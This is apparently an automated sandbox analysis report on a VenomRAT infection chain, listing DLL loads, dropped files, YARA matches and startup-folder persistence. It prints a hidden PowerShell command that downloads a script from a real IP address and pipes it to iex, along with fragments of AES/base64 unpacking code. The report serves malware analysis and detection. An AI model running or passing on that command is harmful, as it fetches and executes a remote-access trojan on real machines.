Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\Package.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\Temp\Package.exe	Section loaded: aclui.dll	Jump to behavior
Source: C:\Windows\Temp\Package.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\Temp\Package.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\Temp\Package.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Temp\Package.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Temp\Package.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\Temp\Package.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\Temp\Package.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\Temp\Package.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\Temp\Package.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\Temp\Package.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: devenum.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mmdevapi.dll	Jump to behavior

Source: C:\Windows\Temp\Package.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32

Jump to behavior

Source: C:\Windows\Temp\Package.exe

Window found: window name: SysTabControl32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Temp\Package.exe

Window detected: Number of UI elements: 24

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: C:\Users\Administrator\source\repos\Project9\Release\Project9.pdb source: Package.exe, 00000003.00000002.1980034324.000000006C4EF000.00000002.00000001.01000000.00000009.sdmp, iviewers.dll.0.dr
Source:	Binary string: OLEView.pdb source: Package.exe, Package.exe, 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Package.exe.0.dr
Source:	Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdb] source: powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdb source: powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: $^q7C:\Users\user\AppData\Local\Temp\envi5f4j\envi5f4j.pdb source: powershell.exe, 00000006.00000002.1753216083.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String($J3Vpk) $qW3iC = [Convert]::FromBase64String($fTMhG) $iAdZA = [Convert]::FromBase64String($OSgCW) $8yrmU = [System.Security.Cryptography.Aes]::Create() $8yrmU.Key = $AohO0

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } \| iex"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } \| iex"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\envi5f4j\envi5f4j.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\envi5f4j\envi5f4j.cmdline"			Jump to behavior

Source: C:\Windows\Temp\Package.exe

Code function: 3_2_001FB905 __EH_prolog3_GS,#540,#4155,StringFromGUID2,wsprintfW,RegQueryValueW,#540,#540,#538,#4155,#4155,#940,#4155,#940,#1197,#355,#2507,#3494,#858,#800,#800,#641,LoadLibraryW,GetProcAddress,#800,#641,#4155,#4155,#940,#1197,FreeLibrary,#6398,#800,#800,#800,#800,

3_2_001FB905

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B9623FE push 8B485F93h; iretd	0_2_00007FFD9B962403
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B960038 push eax; ret	0_2_00007FFD9B960039
Source: C:\Windows\Temp\Package.exe	Code function: 3_2_0020F3B0 push ecx; ret	3_2_0020F3C3
Source: C:\Windows\Temp\Package.exe	Code function: 3_2_0020FDDD push ecx; ret	3_2_0020FDF0
Source: C:\Windows\Temp\Package.exe	Code function: 3_2_001F5EF0 pushad ; ret	3_2_001F5EF1
Source: C:\Windows\Temp\Package.exe	Code function: 3_2_6C4EE864 push ecx; ret	3_2_6C4EE877
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_06994571 push es; ret	11_2_06994580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_06991E30 push es; ret	11_2_06991E40

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\iviewers.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\Package.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\envi5f4j\envi5f4j.dll	Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\iviewers.dll			Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\Package.exe			Jump to dropped file

Boot Survival

Yara detected VenomRAT

Source: Yara match	File source: 6.2.powershell.exe.5b4acca.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.623872a.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5e16f80.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5f3ad0a.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5e16f80.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7940, type: MEMORYSTR

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
